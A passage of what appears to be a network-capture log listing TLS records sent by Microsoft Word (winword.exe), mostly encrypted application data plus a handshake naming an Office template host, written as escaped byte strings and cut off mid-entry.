  418. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb66\\x0e\\x19\\x01\\x18\\xb8\\x12\\xdd\\xect\\x8a0t\\xdd\\x88\\xb0!\\x1e\\x18\\xa0j\\xf2\\xc3|\\x9e\\xd7\\xe4\\\\xdd\\\\x1a:w\\xd7\\xc4\\x13\\x90\\xa3\\xa1b-k(\\xb7u\r1\\xf5w\\xf8\\x15$\\xaa\\x9b\\xf1\\xcc\\x86\\xbch\\xe4\\x147\\xa6\\xd7`\\xe0q\\x83\\x8c\\xa9\\xd3\\xea\\xa1\\x891\\xa9\\xbex4\\x9e\\x87\\x8a\"\\xd3\\x86\\xc9x\\x16ns\\xba \\xd8\\xe7\r\\xba\\xa0\\xb9s\\x9c\\xd8\\xdb\"\\xf6\\x07s\\x9c\\xd3\\xdfn_\\xb2\\xbc\\x16\\xd3\\x91b~v9=\\x1a-\\xf0\\xbb\\x001\\xc2tr\\x93\\xf9\\xce8\\x19\\xd4%\\xe3\\x92\\xa76h\\x90\\xea\\x07\\xe7m(\\xe0\\xf977\\x00\\x8ar\\xbf\\xff\\x8c\\xd9$\\xd5\\xbe\\x1dj9jd\\x88\\xa5g\\x95\\xe9o\\xda)\\xc3\\x8d\\xa3+\\xbf\\x9d\\xc0y\\x9a\\x80\\xb7\\xd2d*\\x85\\xa54\\xc5u\\xad\\x0c\\xdbr\\xfd&\\x08\\xbd3i\\x17w\\xaf\\xc1\\xa5p\\xafl\\x92\\x1b\\xd90\\xd3\\x02\\xaa\\xf51%8\\xe9\\xab\\xda\\x0c=\n\\xf62\\x17\\x8d\\\\xfe\\xaa\\xba\\xc6\\xab|\\xa2h\\xc9&*\\xfek"
  419.  
  420.  
  421. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x1fg\\xa0\\x8d\\x12\\xa2\\x9cd\\x8f\\xd4\\xfe\\xe1o\\x9eb\\xdc\\xd4\\x89\\x12d\\xad\\xbc\\x08`\"nr\\x11\\x99j\\xda7\\xcb\\xb7a\\xc72\\xd8\\xc5l\\xeaec\\x0b\\xf7\\x98zy\\xb7\\xdb\\x97q\\xf9\\x19\\xb1l\\xfdn\\x8c7!l\\xbf\\xa24\\x7fy\n\\x00%pu\\xc4-\\xbe`\\xf8\\x7f\\xb0\\xcf\\x17bf\\x89_\\xe4\\x02\\x9dz\\x16\\xb6\\x15_\\xe1\\xd4\\xb9\\xf1\\xf9y\\x0fuf\\x06\\xc8\\xfc\\x02\\xdf\\xbak_\\x00\\x16\\xc0'\\x9a\\x1ax\\xe0\\x0b\\x17\\xd2\\xc3kh\\xd3\\xf7\\xdd~\\x10(\\x94q\\xfbq;\\xea\\x92\\xce\\x9ay\\xe0\\xb8\\xc4\\x08jn;\\x1f\\x11j\\xdc\\xecb1\\xb6\\x08\\x84\\xb8\\x9f\\xe1\\xb6\\x8f\\xf7\\xd4\\xd4\\xb8\n\\x8d\\xc8\\xc1\\xcf-e\\xd9\\xa0\\xdd\\x0fy\\x8f\\xa6\\xd6\\x08\r7\\xe5\\xf6\\xa6d2\\xae\\xfb;\\xcb@\\xa8\\x89p\\xc6\\x9c\\x02x\\xaa\\x7fp\\x9a\\x05\\xb1\\xab\\xbe^h\\x01\\x17\\xaa\\x81d\\x06\\xe0\\xf5\\xebbk\\x86\\x89\\xb1e\\xd4x\\xa1\\xcb\\xac\\xa3\\xdb\\xc4\\xa86\\xeb\\xe9\\x02\\xdd\\x99\\x82\\xb5\\xeb\\x96\\xc2\\xcb"
  422.  
  423.  
  424. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa9\\x82\\xf0\\x13\\xd0ng\\x0e\\xc6\\xcb\\xff\\x03n\\x86\\x04\\xa8p\\xdb\\xaa\\x8b @\\xcc\\xd96\\x96\\xea\\xca\\xbb'\\xb0\\x19\\xd5i\\x17\\x99\\xf3\\xa9\\x8d\\xc1\\xbfvu\\x8c\\x10\\xa1\\xd2/36\\x92\\xe6\\xf5\\x90\\xaepm\\xc9\\x94\\\\xf0\\x16\\xca\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x97)\\x1ag\\x9amb\\xdc\\xf4\\xd9x\rs\\xdc\\x00\\xbbp\\xb2\\x89\\xfe\\xd6\\x84\\xc1\\xba\\xbbcr\\xea(\\xb1\\xea\\xa5\\xc8\\x9d|*u\\xa2\\x97g\\xc2r\\x0e\\xe82\\x1a\\xdd\\xa0"
  425.  
  426.  
  427. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc2\\xdf\\xf5\\xb8\\x98~x\\xd4,\\xe2\\xe5h\\x8e\\xa9\\xcbmh\\x16in\\x8ac\\xdc?\\x15\\x16\\x0b?\\x0c\\x15\\x0c\\xf0i3s\\x0e\\xc9\\xa1c9pr\\xbc\\x11\\x19\\x8c\\x1c\\xff\\x14\\x18\\x9f\r\\xf7;\\x85\\xc8\\xc0\\x9e\\xfb\\xc1\\x8bcp\\xd4\\x8d\\xd3\\xaf\\x1555t\\xa8\\x80\\xdf\\x9awgh6\\xb9\\x8e\\x86\\x81m\\x05\\xc2-\\xcdb\\x9aca\\xcd\\xb0\\x04\\xea\\xa8ft\\x85<\t\\xc7\\xdc\\x86\\xda\\x8d\\xdf\\x80\\xe6\\x8b\\x8a\"\\x8a\t0i\\xbd\n\\x8f\\xb4@\\xa5!e\\x98\\xc7\\xeeh\\x08\\xd1\\x95`$\\x15h9n\\xd1w\\x07\\xf1|q\\xf8\\xe8\\x139\\x1c\\xcbl\\xdf?\\x9f\\x07>\\xf7\\xc7i\\xeci\\xac\\x08\\x8f\\xddvd\\x9b\\xbb\\xc7\\xea\\xc4$\\x1b\\x05ilh\\x94\\xd8<\\x0b\\x8b\\xf6\\xd3\\x1b\\xa9\\xf5\\x82\\xac)\\x80\\x15\\x08\\xa0\\xef\\xb9\\xfaf\\x97\\xe0/\\xc0\\x9d\\x9f\\x93\\x04'\\x10@\\x86\\xa4\\x8c\\xe1\\xdd:|+\\x84\\x01\\x8b\\x0b0\\x0b\\x8f_\\x1d\\xd2:\\xe6_\n\\x8a\\x8d\\x90f)\\x93\\x82\\x16\\x80\\xd7\\x8b1\\x18\\x92"
  428.  
  429.  
  430. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x9b\\x05h\\xfa\\xa1\\xe7\n@p\\xda\\x9adbs\\x10<\\xeer$\\xcb\\x0f\\xa5\\xc9c\\xb3\\xdc\\xe1\\xaf\\xee\\xe9\\x11\\x8b\\xa7\\xf0\\xd9|\\xf5\\xe3\\xf1\\x8ez\"\\xc1f\\x12\\xee\\x93f\\x17^\\x12y\\x8c\\xab\\xd0\\xe3;\\xdb\\xfe*\\xa3!#\\x8c.<'\\xe5\\x978\\xe3\\xdf3\\x8d\\x9dm\\x14\\x95\\xa8rg\\xb5\\xb4\\x07\\xe6\\x04\\xd9\\xaf\\xfb\\xcdf\\xb3\\xaf\\x1bf\\x8a\\xabs\\xcdq\\x8e\\xf6s\\xb1j\\xbd\\x02g\\xf0c\\xd8\\xb2\\xc6\\xfcn\\xf13\\xc71\\xfd\\x18\"\\x81wf\\xe0&\\xa3\"\\x93k\\x89_\\x0c\\xb6\\x15\\xcc\\x08<\\x86\\xb2i\\xdf\\xb6*\\x9a\\xcb\\xc6t\\xb9k(\\xa3\\x0c\\xa8\\x86\\x0b\\x92s\\xe6\\xc9\\x18t\\xf4\\xa6h\\xc7\\xe1\\xe4|\\xce:\\x84\\xbf\\xd8\\x11j\\xa8\\xb6\\xcfd\\xc0y'o\\x9a\\x05e\\xdc\\x08j\\xd9\\xc9\\x86\\x12\\x9e,\\x13x$\\x07\\x10\\xd7\\x9e\\x90\\xb0b\\xfa:\\x08\\x06e\\x91)db\\xc4u\\xe0xx\\xbf\\x9f\\x0c\\x05\\xc5\\xa3*=\\x8c\\xca\\x10\\xc9\\xa0\\xef,|\\xa6\\x13\\xd4\\x1a-89s="
  431.  
  432.  
  433. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe7\\xb8e\\x8a\\xcd\\xcc/\\xf5\"\\xce\\x93\\x94r\\xb7\\xdbz\\x04x\\x88\\xbbu\\x0ce\\x91g\\xa8>\t\\x1a.\\xf7\\xe8)\\xec\\xd4.!\\xc3\\xf3\\xc2\\x83q0b\\xbb\\xeb6\\x94<\\xa3\\xd1t\\x88\\xc1g\\xa9\\x18@,\\xe0 3i\\x18\\x1e\\xaf\\x8a\\xd6\\x97\\x91~\\xcd\\xe8!\\x12u\\x05r\\x85k\\x97\\xff\\x98\\xf6e\\x9eb_\\xc4\\xa8\\x07\\xb7\\xafxrk\\x08h\\xdb\rty)+\\xb6\\xbfl=\\x82n\\xaf\\xfb)\\xdc\\x08\\x02x\\x1a\\xdc\\x1b\\x1b`\\xda\\xba\\xdf\\xafl\\xbb\\xb4\\x92\\xdf\\xc03d\\xdcqq\\xf2m0y\\xb5\\xa3\\x1d\\x8cd\\xb3\\x03\\xbc\\x1a\\xcdq\\x8ez\\x9da8\\x15\\xef\\x8c\\x17\\xeb\\xff\\xc2\\xce\\\\x9b\\x91\\xcaa\\xd5\\xaa\\xc5-z;\\x1b\\x9e\\xda\\x05$\\xd3\\xd3\\xa7'\\xe1\\x9e\\x0e\r\\xfb\\x0fg\\x0e\\xb5\nr\\xae\\x80\\xbf\\x84\\xa9\\x82\\xbd\\xa0\\xff\\xb3z\\xad3\\xf4\\x814^\\xb4\\x99\\xd3,k\\xf4\\x1a\\xe9q\\xa7/t\\xe8\\xa4\\xc6\\x8e\\x17o\\x8e\\xe9ax#\\xb3$\\x92xuf\\xfe\\x00u\\xd1\\xea\\x00\\x0c"
  434.  
  435.  
  436. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010d\\x81\\xc04(k\\x87~\\xa2?\\xe4\\xacg\\xf1\\x08%\\x91i\\xaf-cn\\xe3=d\\x97r(\\xbaf\\x0f\\xef\\x04\\xf8\\xa1s\\xdb`\\x05\\x1d\\x8f\\xa5\\xeauu\\xa3h-\\xbc\\x12\\xf0\\xebn\\xbb\\x9e\r\\xfe.*\\xf0:9\\xb8y#\\xd1\\x05\\xb7\\xec\\x18\\xda\\xb4\\xc9i\\x8b\\x8cm\\xd18\\xfe\\xdb\\x99\\x94'\\xd7?\\x98\\x9b\\xd62f\\xdd\\x8f\\x8d&x \\xc0\\xaa\\xe0\\xb7\\xe5`\\x1f\\xa7\\x97\\xaa\\xf0\\xb7\\xc0\\xa2\\x98q^\r\\xa8m\\x86\\x1f\\xdc\\xf3.\\xd5\\x13\\xfej\\x9eum\\xee\\x94\\xedr\\x14\\xeb\\x0cxv\\xfd=>\\xdaa\\xe2)g\\x14\\xea\\xdbk/_0\\xb0\\x8f\\xebt`\\xcc0,\\xe1\\x0fe\\x0b\\xa0\\x0f\\x12\\x0e\\x07|\\\\x9a:\\xdfb\\xb9\\xa0\\xce!\\xcd\\xe8u\\xf9\\xcdw\\xe7#n\\x18^\\x84\\xadg\\xf9\\xc2\\x1c\\xabm(l\\x0c\\xb9\\xb2\\xbbc,\\xc8>\\x1bn\\x0f\\xc0o\\xf3\\x0ea\\xa3\\x9a`\\xebr!\\x80d\\xf1\\x1cq\\x17\\xda\\xee\\xa96\\xd6\\xe5\\xa6\\x02p`\\xc63(\\x90\\xdcs\\xec?"
  437.  
  438.  
  439. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010.\\xc3s\\x9cc\\x8a\\xd3\\x8cou8t\\x076\\x1byv\\xa5\\xc4y$\\xae\\x12g\\x98e-d\\xe1;\\xf7`0\\x01tc\\xf5ztfq\\xcd\\x07m\\xc1\\xbd\\xa2\t'(\\xb2,\\x94\\x07\\xbf\\x93\\xd2\\xdd\\xea\\x96\\xf6v\\x04\\xe7i\\xf1\\xf6\\xe8\\x14@\\xf8\\xa2\\x96\\x941\\xb9n\\x0c*\\x0e\\xe8a\\xb6\n\\x99\\x94\\x91\\x17\\xe5gf\\xdd\\xe4f\\x98um\\xb3\\xd3nd\\xa2g\\xa7`\\x19\\x1b\\xbb\\x0c\\xe2\\xaa\\x00o\\x1f\\x85\\x08\\xa8w\\x9a\\xf4w\\x0ep\\x8c\\x8e:\\xed\\x9e\\xdfd\\xcb\\x92\\x10\\x8e\\x8e\\xe3\\x9a\\x1f\\x974\\xfc\\xb2\\x10a\\xe8\\xd94v\\x85\\x998\\x84\\xde\\x05\\xab\\xd0\\xab\\xda;\\x1c\\xba\\xce\\x90\\xd8l\\x03~\\xb9d\\xb3w\\xaa\\xed\\xb2\\x03\\xb9\\x11\\xdb&4y\\xabe\\xafk\\xbaj6\\xc4\\x96y\\xa3\\xb8cm\\xc4\\x9ct\\xd8\\x03!\\x04%\\x03w\\xbfz\\xb3c\\xac3\\x1cn\\xe0\\xb5\\xf3\\x02\\xa2\\x1a\\xd5\"\\xd3\\xb7\\x8el\\xcb?\\xde\\x13\\xc2\\xb2\\x0f\\x12\\xdc\\x06b\\xc8\\\\xb7\\x8e\\xf5\\xe0a$\\x00\\x94"
  440.  
  441.  
  442. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04o\\x87\\x8d\\xa6\\x0f\\x9a\\xbb^\\xbe\\x11\\xec\\xe2g6d\\xf7rr\\xdcw\\xc0\\x96\\x08=\\x9ec\\x99\\xc9-\\xafca\\xba.\\x9c\\xf8\\xe8@b\\xfd\\xc6a\\x04\\xc4\\xb1\\xcd\\xd0\\xb9\\xd2\\x98\\x1f\\x96\\$\\xeb\\x9e\\xffo\\xae\\xf5\\xe7y\\x08\\xa5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000|\\x88\\x8a\\xf5`\\xf7kw\\xf9\\xf8\\x1c\\x84)\\xb5,\\xf0\\xe8i\\xe2\\xe5o.\\xe2\\x99\\x16\\x8b\\xc9(\\xc9\\x0cu3\\x00\\xf4\\xddy|\\x12\\xc1\\xaeh\\xc2\\xd7/\\xd5t"
  443.  
  444.  
  445. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbd@\\xbe\\xaf\\x19\\x00\\x9c2 6\\xe1g\\x1d\\xa5\\xb3\\x19x\\xb8m\\xdc\\xda\\xf7\\x1a\\xdfn2\\x87\\xb9h\\x1fz\\xb7<u\\xb3\\xf5\\x17\nt\\xc8\\xd3\\xd6 \\xc2\\x1a\\x9bqx\\x93\\xd6!\\x16y\\xff^ t\\xaav\\x8e\\xda\\xa9\\x92\\xe6c\\xda\\x03\\x8f\\x00?&\\xd99\\x08\\x95k\\xfe\\x9e\\xbc\\xba\\xd3\\xde\\xb8\\xbazx\"ah\\x93\\xc2r_\\xfa\\xf1\\x10\\x0e\\xc5\\x99\\xbb \\x92\\xd1\\xc27-6lv\\x93\\xf1'\\x99u*\\xbe\\xc3'\\xd2\\x14\\x05\\xa0wwb/\\xb8\\xf9\\xca\\xf2\\xa7\\x18\\xf9\\xf7\\x85\\x1eb\\xff\\xd2\\x19u\\xa1\\xee\\xf4\\xa5\\xb3\\xe8yuc\\xc9ir^\\xf5(\\x1f\\x91\\x88\\xc5g\\x19\\x7ftz\\xe7\\xc2@\n\\xb1!\\xbc<+~\\xe7\\xde\\xba\\x12\\xdey0\\xa3\\xf6\\x85\\x13\\xfa\\x16\nz\\x00\\x92\\xae\\xf8;\\xea\\x11\\x8c\t\\xe0\\x7fga\\xfd\\x1c#y\\xc4\\xde\\x97\rq\\x1c\\x01\\x85e\\xc9\\x18ma\\xd8\\xfe\\x19#s\\x83!v>\\xc4\\xb0\\x90'\\x15\\xf5dtaf\\xd6\\xc1q\\xf6"
  446.  
  447.  
  448. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf4\\xd2\\xacb\\xee\\x86\\x82\\xe7\\xf5q\\x99\\xdex1o\\x1b(/k\\x1cyr\\xce\\xb8v\\x9b\r\\xe3\\xa3\\xce\\x04\\xaf\\xf0\\xc2\\xe5\\xa1\\xd5\\xabk\\xfc\\xfa\\xcf\\xab\\xb4\\x88x\\xe7\\xc5\\xad8'\\x04\\xa4\\x06\\xf5\\x9eo\\xe6zl!j\\xb8z:v\\xa7\\xb2x\\x8c\\xb4\\xa5i\\xee(\\x19.j\\xf7\\xad\\x0c\\x9e\r\\xfb\\x9cx\\x90\\xa5\\x85\\xe9\\xa5\\xe3\\xac\\x15'\\x1b'\\x06\\xfa\\xeb\\x08\\xfe\\xb2\\xfe$\\xbd*(lu\\xee;nj5?2\\xfa\\xd1a\\x08\\x8a\\x95m\\xe0b*\\x0f\\x04\\xad\\x84\\xe1\\xfe\\x89\\x14\\x00\\xcf\\x12\\xc1\\xa6;\\x91\\xb3hkv\\x18\\x08:\\xc737\\xban\\xad\\xc5v\\xd7v\\xe4\\xfdyt\\xdd\\x03\\xb9t\\xf4s\\x8a\\xbcv~vu.5\\xd0\\x96\\xf5\\xc3d\\x19\\xb54\\xf7\\xb1y@6d~\\x8a\\xdcl\\xde\\x85\\xbc\\xd2\\xb5\\xdd\\x7f\\xb2s\\x92)\\x1d\\x0f\\xf9\\xc09\\x00y\\x91\\x84\\x03osv\\xd40\\xee\\xcc%\\x11\\xbc\\x83>cw\\xfa\\xcb=\\xc81\\x92t\\xbak\\x99\\x108\\xa4l\\xbb"
  449.  
  450.  
  451. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010*3\\xf7*\\xd9\\xff\\xf3\\xf3y\\xec_\\xc8\\xd4\\x89\\x91\\xed\\xf4\\xa4|\\x08dr\\x06d\\x94\\x7f\\x8e\\xcd\\xee\\xacd\\x82\\xd3\\x8eb\\x94\\x8d\\xf4\\x95\\xe2xg\\x85jy\\xec-\\x89\\x10\\xd4\\xfc\\xc48\\x04\\xe4*\\x8c\\xc7g\\x99\\x87#\\xc4\\xea\\xef\\xd2\\xadgm^'+\\xe4\\xd5\\x8e\\xf6sv\\xbb\\xbb\\xfc@\\xffp\\xef\\xba|v\\xb2\\xfa\\xd6\\xc9\\x02\\xbd\\xd6/\\x93,$\\xbft^+n\\xc5\\x03\\x03\\xfd\\x87\\x08\\xbef!\\xe4\\xabp\\x8d\\x80\\x01\\x85\\xd7\\x1c=u\\xd3>&3\\x12v\\xdbx\\xe4\\xfb\\xb5\to\\xba\\xd7(\\c\\x8f/\\xd2\\x06 k\\xbb\\xb0u\\xa9\\x9b\\x9c\\xcbd\\x95\\x7f:\\xcb\\xc0\\x9b\\x8ec\\xcf\\xea\\xc6\\x92\n\\xbcw\\xc55\\xd1p\\xc1\\x91\\x10\\x95@#\\x9a\\x92\\x1ba\\x87\\xf0\\xcaq\\x04i\\xe3\\x80\\xf5\\xe3v#\\xcf\\xbc\\x80\\x05.\\x17%\\xc3\\xd2\\xb7\\xf6\\xa7\\xf0\\x8b2\\xdc\\xa69\\xfd|<\\xd7\\xb9\\xc2\\x92\\xc5\\xde\\xac\\x13\\xe6\\xc7\\xa7\\xa7\\x83\\xde*\\x17>\\x7f\\x93'\\xb0\\xf6y|>\\x93\\xca\\xff\\xa2"
  452.  
  453.  
  454. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x03e\\xfd8\\x1f\\xc32\\xde\\x1c\\x05\\xd4a5\\x8b_\\xa1\\x9a\\xa5\\xa0\\x08\\x01\\xa4\\xd4\\x1d\\x81\\x0e\\x89\\x9c\\xd0'\\xdc\\xfd\\x87\\x9f\\xba\\x15\\x04k\\x0b\\xac\\xf3\\xd5\\xce\\xdc\\xeb\\xbd6\\xc1s\\\\xcb,\\xe9ba\\xcd\\x93\\\\x8fj\\x0e\\x03\\x93\\x00\\x16\\x93\\xa1\\xd4\\x06\\x10\\xd5\\xd6\\xc2\\xfc)\\x8b`\\xe2pa9\\xad\\xa4\\x1b?<\\xe3c4\\xa5z\\x96\\x8c\\xed\\xff\\xba\\xfc\\xe3\\xa4,\\xc9\\xa2\\x81\\x17*\\x80q9\\xd9\\xe0@\\xea_\\x9d\\xfc*\\x05\\xf6`m\\xcay\\xf2\\xd1\\xcam\\xe9\\x86\\xb1!$\\x05\\xca\\xc0\\x8e\\x96/\\xd1\\x14\\x97\\xb2x\\xbd\\x12\\xde\\xc6\\xc1qm#4\\xf6\\xddh\\xf6\\xb7\\x13\\x8aj\\xca\\xff4\\x1fz\\xef\\xe1\\xf0\\x1e$\r\\xf1\\xb0v\\x92\\x08ff\\xe2\\x83\\x8d\\xc0\\x1c\\xa8s\\xcd\\x9d\\x91l\\x96\\x9f)d\\x92~m\\x17\\xe8\\xcfsl\\xae\r\\xc2\\x86r\\x03\\x7fx\\x9b\\xe7\\x00\\xc9#\\xd8\\x0e\\xea22(\\x14n\\xea\\x93d\\xcf\\x07v\\x86\\xeff\\xaf\\xe0\\xe8\\xac)~\\xf4;\\x9d.w\\xf4;t\\xb4\\x88/\\xfa\\xeab"
  455.  
  456.  
  457. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010h\\x92i0p\\x10\\x8e\\x93\\x01@\\xf7\\x04\\x97\\xc6;\\x91\\xd9*l\\xce`b\\xd6d^#\\xf4\\xd0\\x11+\\x84=(\\xcf\\xa0\\xc5@\\xe0\\x13\\xed\\xb4\\x96\\xc9&\\xc3s\\x8a\\xb7rg\\xadk\\x07\\x81\\xaax/\\xc1\\xbb\\xa5\\x10\\xb2ja\\x87p0\\x89j\\x07\\xa7\\x1f\\xd0=\\x8f\\xba\\xb5\\xf7\\xd0\\x121\\x16\\xbe\\x96\\x8e\\x91)h\\xd4\\xa9\\x07?\\xf1\\xfe.k\\xda\\x04\\x80\\x8d\rf\\x97\\xa5()\\x90\\x94\\xe6\\x99\\x0b\\xd1\\x07\\x96\\xa1m\\xaa2\\xf7\\xbf\\x94|$\\xc2\\xcf\\x89,\\xea+\\xb0@\\x03\\xcf\\xa5\\x00\\x9a\\xaf1\\x9c6\\xb5\\xc0\\xb7\\xe0_\\x0f\\x8b\\x84\\x88f#\\xe5\\xa8\\x96\\x0b\\xc5n\\xfdr@\\xadi,\\xdc\\xa2a\\xb9\\xeeqyj\\xc1\\xfb\\xa2\\x7f\\xc7\\xb4\\xf6\\xf06\\xa7\\x19\\x8f\\x9e\\x83@\\xa9=4\\x8d*\\xf1g\\x1f\\x0b\\xc9+\\xd6\\x7fb\\x05\\xee\\xb3#\\xadv\\x17\\xb7\\xd5|\\xdb\\x0fulb\\xdd\\xe8r\\x05\\xfa\\x91\\xf0\\xa0\\x10\\xce+\\x84\\xdc\\xf2\\x07q\t\\x891\\xc8x\\x95d\\xcb\\x86c&\\x1f\\x92\\x9b\\xbe3\\xd1h"
  458.  
  459.  
  460. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5a\\xde\\xd9f\\x81\\xff\\x80y\\xbb\\xf5q,^4\\xe3>\\x8c\\xeeq\\x84\\xf0$:p^\\xcfy\\xbf\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  461.  
  462.  
  463. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x9ei\\xe7\\x8e t\\xa5\\xbe.p!:\\x90\\xf9\\xc5\\x89\\xdf\\x07\\xc7\\x8ap\\x13\\xc9\\xeby309\\xc7\\x18\\x17\\xf8\\xec*\\x19r\\x9a\\x0c\\xd8\\xfd0\\x89\\xbc7\\x04d\\x11\\xd5f\\x11\\xe3\\x80\\x0f\\x81xc\\xcb\\xdb\\x06\\x84\\xfex\\x93ji\\xc1\\xb8\\xff\\x91\\x92'\\xd0\\xd4\\xf58@d<\\xe9\\x8c\\xbc|\\xa4/^\\xe0^\\xf0@\\x1d\n\\x1f\\x18gi\\x97\\xa9\\xfd<*\\x19\\xf3\\x9a\\x19xq\\xa4\\x94m8\\x88b';\\xeex\\xa7|\\xe6\\xbf\\x117\t\\xd3\\x9a\\xba@\\x14t7`\\xcb\\xa6\\xd6\\xb4\\xd0rf\\x7fsk$\\x90\\xf4\\x17\\xcd\\xd4k\\x9f\\x05\\x11\\xd0\\x85\\xdcg\\x15\\x83\\xb4\\xd4\\x7f\\xb6`\rjh/\\xa5b\\xd7\\x94\\xea\\x0fr\\xd0.yk8\\xb8\\xbfz+\\xb2\\xb2\\xa5\\xf8\\xd4\\xef\\x8c\\x80t\\xdc\\xfc\\xe9\\x8b\\xc8h\\xfe\\xcb\\x95y\\x9b\\x80\\x90t\\xcd\\xbfdy\\x17\\xcer\\x1f\\xd7@\\xbc\\x00^\\xfc\\xbc\\x8e\\x89\\x11\\x9b\\xbbk\\xcf\\x8c\\xfe\\xa8\\xf9\\x08\\xed\\xe5\"\\xb9\\xdb\\x7f\\xe8\\x02vw\\x89\\xe8\\xc6\\x10"
  464.  
  465.  
  466. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb5\\xb1h\\xe4\\x13\\xe7\\xbc:k\\xa0\\x9au|\\xb4m\\xab\\x95\\xe3\\xac5e\\x12\\xbb\\xb9_o\\xe0\\x18-t\\xfc\n5\\xb2\\xcd\\x95\\xea~\n\\x88\\x9f\\xa6>\\x0c\\xf3\\xef\\xd77\\xfd\\x18\\xd11\\x8c\\xa1zn\\x82\\x88\\x95\\xa5\\x9c\\x83\\x80\\x0f\\x9e\\xc8x\\xe2\\xea\\xbfx\\x7f\\xa6\\xb5\\x8e\\xc0\n\\xa8pu|\\xa7\\x04(f\\x1b\\x03\\xdd\\x82i,\\xb4\\xcf\\xbfr\\xd1`\\x14\\x84\\xa6\\xbes\\x92?\\xb0%\\x94\\x16\\x00\\xf7\\xb3\\xbd\\xd8\\xc6\\xd9\\x11\\xe2\\xcfe\\xf6\\xf8f\\x88h\\x97\\x928f\\xf1\\xde\\xd6.\\x94\\x8d\\xa7+\\x89\\x90\\xa0\\xc1\\x00\\x81\\xf6\\x94\\xab'\\xd9\\x076\\xc4\\x98s\\xb5\\x01\\xb6\\x85\\x93\\xca\\xa1yj\\x8bnz\\x86\\x8c\\xc7\\xe6\\x95p\\xf9mdbi\\xa37\\xb8f\\x80\\xc7\\xd1\\xc9\\xb1\\xbf\\xc3q>\\x02(\\xab\\xcb\\xfe?\r\\x84y\\xa7\\xb2\\xd2\n\\x8c<g\\xc7\\xf8\\xac\\xb8\\x18\\xb1\\xd5\\x8d\\xf0\\xc6\\xd4\\xf9\\xf8d\\xe4\\xbde2\\xcbo\\xdd\\x12\\x0f\\x8fqd\\x1cr\\xac\\x8e\\xda\\xe8x\\xb5:\\xf1\\x8a\\xe0\\\\xa4d\\xad (\\xd3"
  467.  
  468.  
  469. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010$'\\x02\\xbby\\x82\\xa5vs\\xe7a\\xd1\\x87\\x9d\\xa2\\x8d\\xd7\\xab\\xb1m\\x9c\\x8c\\xa4ih|y\\xd9\\xda\\x01\\x98w9\\x14\\xd0\\x01\\x7f\\x85\\xc3my%\\xb1b\\xd4\\xd1\\xc2\\xcd$a!\\x83k7\\xd0\\xbd\\x15\\x85%=7\\xa7\\xe0z\\x02\\xa1am>\\xff\\x00\\x7f\\xce\\xaa%\\xae\\xd4\\x82\\xc1\\x07\\x11c\\xd9u\\xb8\\xfb,vt\\xe9|\\xf5<\r-\\xbez\\xbe\\x12\\xf0)q0u\\x90\r\\xf85i\\xd6\\xafa\\x17\\x11\\x99\\x9d:\\xf8\\xb2i\\xb4\\xe6v\\xc2\\x0f\\xfc\\xeej\\xa7\\xdf3z\\xea\\x1f\\xd7\\xc2\\xacs\\xf1s\\x9c\\xfcyp\\xbc\\xa4\\xda\\xdb\\xe7\\xb1c|\\x82b\\xe2\\xc08\\xd0\\x92\\xa5u.\\xc1\\x05h\\xd1\\x8c2\\xc7\\x81-\\xeb1\\x84k\\x80\\xad\\xb5\\xea\\x1dp>#\\xa2\\xb6dc'^\\xfe\\xc4'c'oh\\xe5pv\\xc3\\x07\\x9aq\\x12l\\xd6\\x08q\\x93\\x94?1>\\xc1\\x17\\xda8\\xbb\\xca\\x04\\xd9pj\\xc1*\\xe7\\xca\\x93\\x1f\\x84\\xc9\\x9c\\x17dl\\x04\\x18+\\x8f\rx\\xf3=k\"\\xc6\\x9f"
  470.  
  471.  
  472. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010k\\xcc/\\xed\\xe7\\x97\\x8fpv7\\x1b\\xbf\\x16\\xa4\\xb1\\x12\\x0f\\xaf\\x84\\xad!\\x1c\\xd7\\x02-\\xcf\\x96\\xa9\\xfcf\\xeex\\xe2z\\xa0b\\x12\\xbd\\x0e\\xf5\\xab\\xe0n\\x89\\xc3\\x8fu\\x99m\\x80*\\xdf@-l\\xa6skq\\xaf\npr?\\x97^\\xa4x\\x1c_\\xed\\x0f\\xd9qw\\xce\\x90<&)\\xb4\\xd5\\xad\\xc5\\x8c\\x15\\xc3f_f|sc0\\x19\\xf5\\xdc\\x13\\x97\r\\x88\\xe1\\xc4x\\xe7\\xcd\\xe1\\xc0z\\xfac0o 